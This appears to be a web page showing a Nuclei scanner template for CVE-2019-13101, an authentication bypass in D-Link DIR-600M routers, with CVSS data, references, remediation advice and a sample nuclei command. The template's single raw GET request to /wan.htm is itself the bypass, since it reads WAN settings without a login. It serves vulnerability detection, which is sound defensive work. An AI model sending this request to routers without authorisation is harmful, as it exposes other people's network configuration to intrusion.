Skip to content

D-Link DIR-600M - Authentication Bypass

ID: CVE-2019-13101

Severity: critical

Author: Suman_Kar

Tags: cve2019,cve,packetstorm,edb,dlink,router,iot

D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices can be accessed directly without authentication and lead to disclosure of information about the WAN, which can then be leveraged by an attacker to modify the data fields of the page.

id: CVE-2019-13101
info:
name: D-Link DIR-600M - Authentication Bypass
author: Suman_Kar
severity: critical
description: D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices can be accessed directly without authentication and lead to disclosure of information about the WAN, which can then be leveraged by an attacker to modify the data fields of the page.
impact: |
An attacker can bypass authentication and gain unauthorized access to the router's settings, potentially leading to further compromise of the network.
remediation: |
Update the router's firmware to the latest version provided by D-Link.
reference:
- https://github.com/d0x0/D-Link-DIR-600M
- https://www.exploit-db.com/exploits/47250
- https://nvd.nist.gov/vuln/detail/CVE-2019-13101
- https://us.dlink.com/en/security-advisory
- http://packetstormsecurity.com/files/153994/D-Link-DIR-600M-Wireless-N-150-Home-Router-Access-Bypass.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-13101
cwe-id: CWE-306
epss-score: 0.06909
epss-percentile: 0.93911
cpe: cpe:2.3:h:dlink:dir-600m:-:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: dlink
product: dir-600m
tags: cve2019,cve,packetstorm,edb,dlink,router,iot
http:
- raw:
- |
GET /wan.htm HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "/PPPoE/"
- type: status
status:
- 200
# digest: 4a0a00473045022100c5b3b507381afcf7ebca0c1b0426060c13ff8a5e217bd25372dcb3ead921ce0f022016f03ab676b4f322691ef7b23f60fe89d33c87368194f17db3375490003ba3b0:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-13101.yaml"

View on Github